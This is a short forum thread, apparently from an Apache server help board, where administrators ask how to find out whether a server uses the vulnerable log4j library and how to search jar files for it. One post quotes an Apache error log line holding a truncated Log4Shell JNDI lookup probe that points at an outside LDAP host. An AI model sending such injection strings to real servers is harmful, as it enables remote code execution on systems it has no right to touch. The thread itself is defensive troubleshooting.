| Author |
|
smallzoo
Joined: 13 Dec 2021
Posts: 3
Location: UK,manchester
|
 Posted: Mon 13 Dec '21 22:56 Post subject: LOG4J |
 |
|
Is there any way of checking if a server is using log4j anywhere
I understand this is a bad security risk and needs to be sorted asap
Thanks |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7371
Location: Germany, Next to Hamburg
|
| Posted: Mon 13 Dec '21 23:50 Post subject: |
|
|
Hi!
That doesn't apply to httpd apache. Only if you run apache tomcat with log4j or any other Java based software usinf log4j. And then you can search for a log4j**.jar file. |
|
| Back to top |
|
smallzoo
Joined: 13 Dec 2021
Posts: 3
Location: UK,manchester
|
| Posted: Mon 13 Dec '21 23:57 Post subject: |
|
|
| James Blond wrote: | Hi!
That doesn't apply to httpd apache. Only if you run apache tomcat with log4j or any other Java based software usinf log4j. And then you can search for a log4j**.jar file. |
sorry for the dumb question, how do I know if the site is running https apache or tomcat ? |
|
| Back to top |
|
James Blond
Moderator
Joined: 19 Jan 2006
Posts: 7371
Location: Germany, Next to Hamburg
|
|
| Back to top |
|
dmye
Joined: 23 Nov 2021
Posts: 7
|
| Posted: Tue 14 Dec '21 6:39 Post subject: |
|
|
[core:error] (20024)The given path is misformatted or contained invalid characters: [client 1.2.3.4..] AH00127: Cannot map GET /$%7Bjndi:ldap://1.2.3.4..
Why not authz_core:error?core:error it will be becaus Directory bypass ? |
|
| Back to top |
|
smallzoo
Joined: 13 Dec 2021
Posts: 3
Location: UK,manchester
|
| Posted: Tue 14 Dec '21 11:27 Post subject: |
|
|
The website is hosted on Amazon EC2
I can see now that there is a simple patch but what is the console command to check for ever occurrence of log4j in a filename and also in any third party jar file ?
thanks |
|
| Back to top |
|
Steffen
Moderator
Joined: 15 Oct 2005
Posts: 3092
Location: Hilversum, NL, EU
|
|
| Back to top |
|
